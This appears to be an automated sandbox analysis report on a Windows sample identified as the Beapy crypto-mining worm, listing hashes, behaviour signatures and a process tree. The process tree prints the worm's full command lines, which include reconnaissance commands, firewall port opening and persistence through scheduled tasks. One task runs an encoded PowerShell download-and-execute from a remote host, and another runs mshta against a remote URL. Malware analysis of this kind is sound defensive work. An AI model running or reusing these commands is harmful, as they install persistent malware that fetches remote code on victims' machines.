Analysis

  • max time kernel
    151s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    05-04-2021 09:26

General

  • Target

    2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe

  • Size

    7.8MB

  • MD5

    21ff567a59d78b24c3fcaaba01b6a157

  • SHA1

    8dd675c4a6970d227579b5c1ccc748fd1b03de4c

  • SHA256

    2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436

  • SHA512

    bf8e7efa3b048352f2b9c1551e5a7875735af8f5596322d93b886bd359ae8b40f38844095ea58b9b0afd086e0f47f111c928f738309eea9d15e8f1ae58333ca4

Malware Config

Signatures

  • Beapy

    Beapy is a python worm with crypto mining capabilities.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Executes dropped EXE 3 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Loads dropped DLL 22 IoCs
  • Drops file in Windows directory 5 IoCs
  • Detects Pyinstaller 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 9 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Gathers network information 2 TTPs 3 IoCs

    Uses commandline utility to view network configuration.

  • Modifies data under HKEY_USERS 53 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe
    "C:\Users\Admin\AppData\Local\Temp\2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1108
    • C:\Users\Admin\AppData\Local\Temp\2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe
      "C:\Users\Admin\AppData\Local\Temp\2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1032
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c wmic ntdomain get domainname
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:816
        • C:\Windows\SysWOW64\Wbem\WMIC.exe
          wmic ntdomain get domainname
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:920
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c net localgroup administrators
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:528
        • C:\Windows\SysWOW64\net.exe
          net localgroup administrators
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1476
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 localgroup administrators
            5⤵
              PID:1412
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c net group "domain admins" /domain
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:584
          • C:\Windows\SysWOW64\net.exe
            net group "domain admins" /domain
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1304
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 group "domain admins" /domain
              5⤵
                PID:632
          • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe -exec bypass "import-module C:\Users\Admin\AppData\Local\Temp\m2.ps1"
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2012
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ipconfig /all
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1232
            • C:\Windows\SysWOW64\ipconfig.exe
              ipconfig /all
              4⤵
              • Gathers network information
              PID:1368
          • C:\Windows\SysWOW64\ipconfig.exe
            ipconfig /all
            3⤵
            • Gathers network information
            PID:920
          • C:\Windows\SysWOW64\netstat.exe
            netstat -na
            3⤵
            • Gathers network information
            • Suspicious use of AdjustPrivilegeToken
            PID:1416
      • C:\Windows\inZXJGwq.exe
        C:\Windows\inZXJGwq.exe
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:2084
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c call "c:\windows\temp\tmp.vbs"
          2⤵
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:952
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
            3⤵
            • Modifies data under HKEY_USERS
            PID:2312
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c echo GvMefkV >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&copy /y c:\windows\temp\svchost.exe c:\windows\caHBLfKm.exe&move /y c:\windows\temp\dig.exe c:\windows\EMmor.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn caHBLfKm /tr "C:\Windows\caHBLfKm.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\PhtBWGx" /tr "c:\windows\EMmor.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pEIDQHRRL"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\EMmor.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\caHBLfKm.exe"&schtasks /run /TN escan)
              4⤵
              • Drops file in Windows directory
              PID:2268
              • C:\Windows\SysWOW64\netsh.exe
                netsh firewall add portopening tcp 65533 DNSd
                5⤵
                • Modifies data under HKEY_USERS
                PID:2364
              • C:\Windows\SysWOW64\netsh.exe
                netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
                5⤵
                • Modifies data under HKEY_USERS
                PID:1800
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F
                5⤵
                • Creates scheduled task(s)
                PID:2348
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn caHBLfKm /tr "C:\Windows\caHBLfKm.exe" /F
                5⤵
                • Creates scheduled task(s)
                PID:2376
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\PhtBWGx" /tr "c:\windows\EMmor.exe" /F
                5⤵
                • Creates scheduled task(s)
                PID:2340
      • C:\Windows\rVKyyjxF.exe
        C:\Windows\rVKyyjxF.exe
        1⤵
          PID:2316
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c call "c:\windows\temp\tmp.vbs"
            2⤵
            • Modifies data under HKEY_USERS
            PID:2368
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
              3⤵
              • Modifies data under HKEY_USERS
              PID:2404
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c echo VSQi >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&copy /y c:\windows\temp\svchost.exe c:\windows\sUBhFuFA.exe&move /y c:\windows\temp\dig.exe c:\windows\Gvwyq.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn sUBhFuFA /tr "C:\Windows\sUBhFuFA.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\QcLTY" /tr "c:\windows\Gvwyq.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pEIDQHRRL"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\Gvwyq.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\sUBhFuFA.exe"&schtasks /run /TN escan)
                4⤵
                • Drops file in Windows directory
                PID:2144
                • C:\Windows\SysWOW64\netsh.exe
                  netsh firewall add portopening tcp 65533 DNSd
                  5⤵
                  • Modifies data under HKEY_USERS
                  PID:2608
                • C:\Windows\SysWOW64\netsh.exe
                  netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
                  5⤵
                  • Modifies data under HKEY_USERS
                  PID:2436
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F
                  5⤵
                  • Creates scheduled task(s)
                  PID:2580
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn sUBhFuFA /tr "C:\Windows\sUBhFuFA.exe" /F
                  5⤵
                  • Creates scheduled task(s)
                  PID:2640
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\QcLTY" /tr "c:\windows\Gvwyq.exe" /F
                  5⤵
                  • Creates scheduled task(s)
                  PID:2732
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c call "c:\windows\temp\tmp.vbs"
            2⤵
            • Modifies data under HKEY_USERS
            PID:2872
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
              3⤵
              • Modifies data under HKEY_USERS
              PID:2816
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c echo fNEsuOU >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\hash.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&copy /y c:\windows\temp\svchost.exe c:\windows\sUBhFuFA.exe&move /y c:\windows\temp\dig.exe c:\windows\Gvwyq.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn sUBhFuFA /tr "C:\Windows\sUBhFuFA.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\uJoTYp" /tr "c:\windows\Gvwyq.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pEIDQHRRL"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\Gvwyq.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\sUBhFuFA.exe"&schtasks /run /TN escan)
                4⤵
                • Drops file in Windows directory
                PID:1668
                • C:\Windows\SysWOW64\netsh.exe
                  netsh firewall add portopening tcp 65533 DNSd
                  5⤵
                  • Modifies data under HKEY_USERS
                  PID:2936
                • C:\Windows\SysWOW64\netsh.exe
                  netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
                  5⤵
                  • Modifies data under HKEY_USERS
                  PID:1200
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F
                  5⤵
                  • Creates scheduled task(s)
                  PID:2584
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn sUBhFuFA /tr "C:\Windows\sUBhFuFA.exe" /F
                  5⤵
                  • Creates scheduled task(s)
                  PID:680
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\uJoTYp" /tr "c:\windows\Gvwyq.exe" /F
                  5⤵
                  • Creates scheduled task(s)
                  PID:1556
        • C:\Windows\fUHQAmUc.exe
          C:\Windows\fUHQAmUc.exe
          1⤵
            PID:2420
          • C:\Windows\HHlwNCjJ.exe
            C:\Windows\HHlwNCjJ.exe
            1⤵
              PID:2632
            • C:\Windows\system32\taskeng.exe
              taskeng.exe {28484007-237B-4893-9417-C8F2B328DCB3} S-1-5-18:NT AUTHORITY\System:Service:
              1⤵
                PID:2344
                • C:\Windows\sUBhFuFA.exe
                  C:\Windows\sUBhFuFA.exe
                  2⤵
                  • Executes dropped EXE
                  PID:2980
                  • C:\Windows\sUBhFuFA.exe
                    C:\Windows\sUBhFuFA.exe
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:1984
                • C:\Windows\caHBLfKm.exe
                  C:\Windows\caHBLfKm.exe
                  2⤵
                  • Executes dropped EXE
                  PID:3032

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • memory/1032-6-0x00000000760D1000-0x00000000760D3000-memory.dmp

                Filesize

                8KB

              • memory/2012-55-0x0000000001F90000-0x0000000001F91000-memory.dmp

                Filesize

                4KB

              • memory/2012-64-0x000000001A890000-0x000000001A891000-memory.dmp

                Filesize

                4KB

              • memory/2012-59-0x00000000024E0000-0x00000000024E1000-memory.dmp

                Filesize

                4KB

              • memory/2012-60-0x0000000002600000-0x0000000002601000-memory.dmp

                Filesize

                4KB

              • memory/2012-62-0x000000001B700000-0x000000001B701000-memory.dmp

                Filesize

                4KB

              • memory/2012-57-0x000000001A940000-0x000000001A942000-memory.dmp

                Filesize

                8KB

              • memory/2012-56-0x000000001AB60000-0x000000001AB61000-memory.dmp

                Filesize

                4KB

              • memory/2012-63-0x000000001A94A000-0x000000001A969000-memory.dmp

                Filesize

                124KB

              • memory/2012-58-0x000000001A944000-0x000000001A946000-memory.dmp

                Filesize

                8KB

              • memory/2012-53-0x000007FEFBA51000-0x000007FEFBA53000-memory.dmp

                Filesize

                8KB

              • memory/2012-54-0x000007FEF5300000-0x000007FEF5CEC000-memory.dmp

                Filesize

                9.9MB